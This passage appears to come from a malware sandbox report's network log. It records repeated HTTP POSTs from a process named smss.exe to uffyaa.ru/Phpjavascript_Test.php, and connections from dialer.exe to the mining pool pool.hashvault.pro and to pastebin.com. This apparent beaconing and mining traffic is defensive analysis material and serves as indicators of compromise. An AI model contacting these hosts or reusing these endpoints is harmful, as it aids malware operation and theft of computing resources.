                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JAi5zH1rVLyhvMC0ScjFOZUWhA3hgcwUtUgkCMU%2BupcC3mP3S3yWR0wp21Op5WAXbcFndy11dUImYaRkoIUAynM1%2BGixv%2FK%2Fwx%2Bnh%2FqkmaedieVRrrdwOYxuCAM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3de4f4888a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54586&min_rtt=47859&rtt_var=4373&sent=346&recv=347&lost=0&retrans=8&sent_bytes=63592&recv_bytes=251200&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:03:04 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QlhNrTvzLkLdS3dbOYIt0C%2FzSMDIpxgahTy4xulx%2FuZEM69zYaY5u3Md48kESzhl7PyB3bPejHETPWJ6rak99aWcRGznxKkqI%2FEygRK2f9R78irAjm5fnKoV9U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3e6abc488a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=55534&min_rtt=47859&rtt_var=3892&sent=350&recv=351&lost=0&retrans=8&sent_bytes=64574&recv_bytes=253535&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:03:06 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2FEcwX%2BCA4FclNIbY2qd2DmBC08vkwUvQUaWxgOtpM7fE%2BUNMUvDlm3XdivgoZSZpCzhwmERTi24evtRqMGnpZw3tzRxtKJaGa2UlYyYzVx0TBKgqYIZ%2F%2FXnoVc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3ee5e6688a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=55926&min_rtt=47859&rtt_var=4781&sent=354&recv=355&lost=0&retrans=8&sent_bytes=65550&recv_bytes=255870&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:03:07 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2kC98YNWEsaEpbA5QprcsaMI7qwlenZsmqAZp3q9ktTJS3gixCNPDW4UYGr395OpHPx%2F7MsncvDwO0c9y%2BvwF6FavcMwhMqA4HHUILyBx8MufxMoCCG%2BTaIMLBc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3f6ebdc88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=55143&min_rtt=47859&rtt_var=3947&sent=358&recv=359&lost=0&retrans=8&sent_bytes=66532&recv_bytes=258205&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:03:08 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jx87C3zutMZI6seI8RPnb0AIpxoDyn7tGMzUK8XtAbXPERgLggRm7u%2FRpZNOik%2BEuabKZ3APbpTFnmX86CX7O8eJDecAkfE9ueOOdIPrn2TWQqOS5r99MSMUVRw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc3fe7f0588a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54206&min_rtt=47859&rtt_var=3526&sent=362&recv=363&lost=0&retrans=8&sent_bytes=67508&recv_bytes=260540&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:03:09 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VgEPt%2F8RNnIjhPY3AiiFOyeIFZ6PncWepjl%2BVcPzDLbWfupzsZiS%2FAnejkr2UrsUFLFK2iQAaDg5X1pf2bhS2WoPkhEabDQ2HiN7f%2BjA4DfffeBACYpk29nf78E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc4063c3b88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54259&min_rtt=47859&rtt_var=3665&sent=366&recv=367&lost=0&retrans=8&sent_bytes=68482&recv_bytes=262875&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:03:11 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sDb9JjoC%2B1kM8lA3oadt92ex7%2FPItCsltbk8WlIEzyThc25q0JpqUK51%2FU293%2B2Q%2FjSHm6sA5ZpcQy0vj9yg7M%2FApZLH1t1gTHKgrbdJSm33L8otqa5StmS1CV8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc40ddfe388a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=54674&min_rtt=47859&rtt_var=2823&sent=370&recv=371&lost=0&retrans=8&sent_bytes=69460&recv_bytes=265210&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:03:12 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qs3dxcC3%2FEe8IaWWtbghHhLFS%2FjXdAj1Hudda1Cdg0BT16HdA%2F4WKzzRwu5vYQpOpHUpAUgHM62c1KeedVe7op1%2BmXwjQhpQHRDrSAnXpUPahx6RpO6xcyAuubE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc415db4788a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=55040&min_rtt=47859&rtt_var=4418&sent=374&recv=375&lost=0&retrans=8&sent_bytes=70442&recv_bytes=267545&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2076
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:03:13 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V3%2Bud0GgHA6Wo8SCL4MoIfvoBd7uAOe4t9d8FV9pJzlrsA2dGGCV6TgX9Kg5ZPngCZXq3kueipfEpu2s0rt94ZgzHGshoxb%2BW7tpPZYL9VwN%2Bq0P9jQgi7PtGbs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc41dad7588a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=57149&min_rtt=47859&rtt_var=6173&sent=378&recv=379&lost=0&retrans=8&sent_bytes=71420&recv_bytes=269864&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:03:14 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q8XNZ4G1HO6fj1TrCfZEExlTKbPu3kKQE6pXSnAs4i7S6l%2FUyfqPz9IGxjevazpDcBlAvtQ%2F99j8xEE4O82LQpjxUpZPQD%2BIopbEZh2sqWAs5CNsWijvS7cDFTs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc4256efb88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=56758&min_rtt=47859&rtt_var=5852&sent=382&recv=383&lost=0&retrans=8&sent_bytes=72396&recv_bytes=272199&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:03:16 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S788mjwAtGi5pHKLbSu6XpKGnJc0YjAAIln3HcmXf1JNr9FwPrQixtZwJN6s4piQrtgKQzGtslKbAGoP2pLXVM0rHee9DfXV7IikvouyIo9hWpFmcaM1caBoKqg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc42d092c88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=55671&min_rtt=47859&rtt_var=5076&sent=386&recv=387&lost=0&retrans=8&sent_bytes=73372&recv_bytes=274534&delivery_rate=55734&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:41 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AM3c2pSgSIXNpBY3VCkJJ8TR1EU6%2BA7xZ8exWlXlj6HpxGFs5dgh2de15Ovrqsf21TiqjGpQp1Sw7m1BMN3QUoO6eEbM%2BstBO37qxJUCSN5K6EpNTsSncqwHIGE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc1db9bce71fa-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=58136&min_rtt=53789&rtt_var=23276&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1731&delivery_rate=25228&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:30 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RkknUJCodsbNucFzKiRHfVzHblYu4NkCnVm0AMZOdMptTSFamVCj4IGbtLGzYSUzRV879af2GGCvNpbn7AcyfU%2F0ukM5sBqMkwrvIMtcB3Z3ck6kqiQOCL%2BB3a4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc30d7f0d71fa-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=58441&min_rtt=53789&rtt_var=18067&sent=8&recv=9&lost=0&retrans=1&sent_bytes=1016&recv_bytes=4066&delivery_rate=44801&cwnd=253&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2092
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:02:31 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axCRDmWrAi3OBUmuhkT2EvGO30Esi%2BS4o%2BUDOyS1pv8aG4e2dyIr3XbbhuKCbGzg%2FsPs7ZKuKFgtGe2IDA4ZivnnFzqSg2fdZqggpX96tJ%2B1%2BOrHHh%2BTqct0ZI8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc316b9c971fa-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=57524&min_rtt=51626&rtt_var=11573&sent=12&recv=13&lost=0&retrans=1&sent_bytes=1984&recv_bytes=6401&delivery_rate=52523&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • 95.179.241.203:443
                                                                                                          pool.hashvault.pro
                                                                                                          tls
                                                                                                          dialer.exe
                                                                                                          1.3kB
                                                                                                          3.1kB
                                                                                                          8
                                                                                                          8
                                                                                                        • 104.20.3.235:443
                                                                                                          pastebin.com
                                                                                                          tls
                                                                                                          dialer.exe
                                                                                                          1.0kB
                                                                                                          5.2kB
                                                                                                          11
                                                                                                          12
                                                                                                        • 95.179.241.203:443
                                                                                                          pool.hashvault.pro
                                                                                                          tls
                                                                                                          dialer.exe
                                                                                                          1.8kB
                                                                                                          8.9kB
                                                                                                          17
                                                                                                          18
                                                                                                        • 104.21.9.141:80
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          http
                                                                                                          smss.exe
                                                                                                          308.2kB
                                                                                                          89.6kB
                                                                                                          406
                                                                                                          381

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

                                                                                                          POST http://uffyaa.ru/Phpjavascript_Test.php

                                                                                                          HTTP Response

                                                                                                          200

                                                                                                          HTTP Request

